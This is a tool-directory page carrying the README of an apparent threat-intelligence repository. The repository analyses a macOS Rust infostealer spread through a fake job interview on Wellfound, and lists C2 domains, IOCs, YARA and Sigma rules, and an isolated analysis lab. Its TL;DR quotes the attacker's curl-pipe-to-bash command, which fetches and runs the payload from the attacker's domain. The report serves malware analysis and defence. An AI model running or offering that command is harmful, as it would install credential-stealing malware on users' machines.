Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
hyperhives-macos-infostealer-analysis — Full static analysis of HyperHives macOS Rust infostealer — 571 decrypted config values, C2 infrastructure, DPRK/Contagious Interview attribution, YARA/Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer | Kitploit
Tools/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
Indicator of Compromise (IOC) ManagementOSINT (Open Source Intelligence)Reverse EngineeringForensicsMalware AnalysisThreat IntelligencePapers & ResearchLearning & EducationCurated Resources

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

Full static analysis of HyperHives macOS Rust infostealer — 571 decrypted config values, C2 infrastructure, DPRK/Contagious Interview attribution, YARA/Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer

View RepositoryWebsite
314135 months agoReviewed by Kitploit

HyperHives macOS Infostealer — Full Technical Analysis

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

Threat intelligence: Rust-based macOS universal binary infostealer delivered through a fake job interview pipeline on Wellfound (formerly AngelList). The operator persona "Felix" from "HyperHive" lured targets into running a malicious installer from macos.hyperhives.net. This repository documents complete static analysis: 571 encrypted configuration values recovered, including C2 URLs, a Sentry DSN, and 276 targeted Chrome extension IDs.

Sample SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2 Domaincloudproxy.link
Delivery Domainmacos.hyperhives.net
Lure platformWellfound (formerly AngelList)
Operator persona"Felix" at "HyperHive"
VirusTotal9 / 63 detections
ClassificationPublic disclosure / IOC bundle
Last updatedApril 2026

Contents

  • Threat-intelligence bundles
  • Repository layout
  • Quick start
  • TL;DR
  • 1 — How it started
  • 2 — The binary
  • 3 — What it steals
  • 4 — Decrypted C2 infrastructure
  • 5 — Attribution
  • 6 — Cryptanalysis
  • 7 — MITRE ATT&CK mapping
  • 8 — Wallet and extension-ID reference
  • 9 — Recommended actions
  • 10 — Methodology
  • Appendix A — All 276 Chrome extension IDs
  • Scope and limitations
  • Release history
  • Contributing
  • License

Threat-intelligence bundles

FileFormatPurpose
iocs.txtPlain textHashes, domains, URLs, IPs, email, Sentry IDs — paste into blocklists, MISP, OpenCTI
yara_rules.yarYARA 4.2+Known-sample hash match + heuristic string detections for Mach-O
sigma_rules.ymlSigmaProxy, DNS, and process-creation rules — tune logsource for your SIEM
stix/bundle.jsonSTIX 2.1Machine-readable CTI bundle with indicators, malware SDO, infrastructure, ATT&CK patterns, and relationships
attack-navigator-layer.jsonATT&CK NavigatorImport into ATT&CK Navigator for visual technique coverage

Repository layout

.
├── README.md                      # This report
├── iocs.txt                       # Flat IOC list
├── yara_rules.yar                 # YARA detection rules
├── sigma_rules.yml                # Sigma detection rules
├── stix/
│   └── bundle.json                # STIX 2.1 threat-intelligence bundle
├── attack-navigator-layer.json    # ATT&CK Navigator layer
├── output/
│   ├── full_decrypted_config.json # Machine-readable decrypted configuration
│   ├── iocs.json                  # Structured IOC export
│   ├── c2_protocol.txt            # C2 protocol field documentation
│   ├── cargo_dependencies.txt     # Embedded Rust crate list (97 crates)
│   ├── source_map.txt             # Reconstructed source-file layout
│   └── targets.txt                # Targeted applications and data paths
├── scripts/
│   ├── decrypt_all.py             # Definitive config decryptor (Unicorn emulation)
│   ├── analyze.py                 # Static analysis driver
│   ├── extract_all.py             # String and structure extractor
│   ├── r2_analyze.py              # Radare2 analysis automation
│   ├── r2_targeted.py             # Targeted R2 analysis for helpers
│   └── validate_repo.py           # CI validation script
├── sample/
│   └── README.md                  # Instructions for sample placement
├── Dockerfile                     # Analysis container image
├── docker-compose.yml             # Air-gapped compose config
├── lab.sh                         # Helper script for Docker lab
├── SECURITY.md                    # Safe handling and vulnerability reporting
├── CONTRIBUTING.md                # Contribution guidelines
├── CHANGELOG.md                   # Release history
├── LICENSE                        # MIT
└── .github/
    ├── workflows/validate.yml     # CI: YARA + Sigma + file checks
    ├── ISSUE_TEMPLATE/            # Structured issue forms
    └── PULL_REQUEST_TEMPLATE.md   # PR checklist

Quick start

Place the sample as sample/installer_binary (see sample/README.md for hash verification), then:

docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

The compose file enforces network_mode: none, read_only: true, and drops all Linux capabilities. See SECURITY.md for full handling guidelines.


TL;DR

A job posting on Wellfound (formerly AngelList) led to a multi-email social-engineering chain from an operator persona "Felix" at "HyperHive". After flattering the target's technical background and scheduling a fake interview, the attacker directed the victim to "review the product" at hyperhives.net and specifically examine Settings → Diagnostics → Log — a pretext to trigger execution of:

curl -s https://macos.hyperhives.net/install | nohup bash &

The payload is an 8.5 MB Mach-O universal binary (x86_64 + arm64) compiled in Rust. Static analysis with an air-gapped Docker lab and CPU emulation of 570 unique x86_64 helper routines recovered all 571 encrypted configuration values, exposing:

  • C2: cloudproxy.link — four HTTPS endpoints
  • Sentry (attribution pivot): full DSN with org/project IDs on ingest.de.sentry.io
  • Build identity: Cargo user rootr, codename force, version 9.12.1
  • Targets: 276 Chrome extension IDs (crypto wallets, password managers, corporate credentials)

Tactics align with DPRK-linked Contagious Interview campaigns — fake job recruiting on legitimate platforms, multi-step trust building, curl | bash delivery, Rust macOS stealer, and crypto-focused exfiltration.


1 — How it started

The lure: fake job interview on Wellfound

The attack began with a legitimate-looking job posting on Wellfound (formerly AngelList). After the target applied, the following email chain ensued from an operator using the persona "Felix" and the company name "HyperHive":

Download Tool